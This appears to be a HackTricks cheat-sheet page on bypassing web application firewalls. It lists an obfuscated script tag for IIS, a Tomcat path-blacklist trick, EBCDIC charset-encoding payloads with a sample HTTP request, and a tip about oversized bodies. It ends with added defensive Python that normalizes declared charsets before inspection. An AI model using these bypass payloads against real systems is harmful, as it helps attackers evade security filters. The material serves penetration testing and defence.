HackTricks
WAF Bypass
# IIS, ASP Classic
<%s%cr%u0131pt> == <script>

# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;

# Charset encoding
application/x-www-form-urlencoded;charset=ibm037
multipart/form-data; charset=ibm037,boundary=blah
multipart/form-data; boundary=blah; charset=ibm037

## Python code
from urllib.parse import quote_plus

s = 'payload'
# Encode the payload as IBM037 (EBCDIC) bytes, then URL-encode those bytes
print(quote_plus(s.encode("IBM037")))

## Request example
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61

%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n

It's common for cloud-based WAFs not to check a request at all if the payload is bigger than X size. You can simply use that to bypass them.
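The charset trick above only works when the filter matches on raw bytes while the backend decodes the body with the charset the request declares. As an added example (not from the original page), this is the normalization step a filter needs before its rules run: read the `charset` parameter wherever it sits in `Content-Type`, decode the body with it, and flag charsets the application never uses. The allow-list `EXPECTED_CODECS`, the function names and the verdict strings are assumptions.

```python
import codecs
import re
from urllib.parse import unquote_to_bytes

# Assumption: the protected application only ever expects these body charsets.
EXPECTED_CODECS = {"utf-8", "ascii"}

def declared_charset(content_type):
    """Return the charset parameter of a Content-Type header, or None.

    Parameters are split on ';' and ',' so the result does not depend on
    whether charset comes before or after boundary."""
    for param in re.split(r"[;,]", content_type)[1:]:
        name, _, value = param.partition("=")
        if name.strip().lower() == "charset":
            return value.strip().strip('"').lower()
    return None

def normalize_form_body(content_type, body):
    """Decode a urlencoded body with the charset the request declares.

    Returns (verdict, fields): verdict is 'inspect' for an expected charset,
    'flag' for a valid but unexpected one and 'reject' for an unknown one.
    fields holds the decoded (name, value) pairs to hand to the rule engine."""
    try:
        codec = codecs.lookup(declared_charset(content_type) or "utf-8").name
    except LookupError:
        return "reject", []
    fields = []
    for pair in body.split(b"&"):
        name, _, value = pair.partition(b"=")
        fields.append(tuple(unquote_to_bytes(part).decode(codec, "replace")
                            for part in (name, value)))
    return ("inspect" if codec in EXPECTED_CODECS else "flag"), fields

# Content-Type and body copied from the request example above.
PAGE_CT = "application/x-www-form-urlencoded; charset=ibm500"
PAGE_BODY = b"%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n"
# Constructed benign request for comparison.
PLAIN_CT = "application/x-www-form-urlencoded"
PLAIN_BODY = b"q=hello%20world"

if __name__ == "__main__":
    for ct, body in ((PAGE_CT, PAGE_BODY), (PLAIN_CT, PLAIN_BODY)):
        print(ct, "->", normalize_form_body(ct, body))
```

Rules that run on the decoded `fields` see the same strings the backend will; the `+`-to-space translation of form encoding is left out to keep the example short.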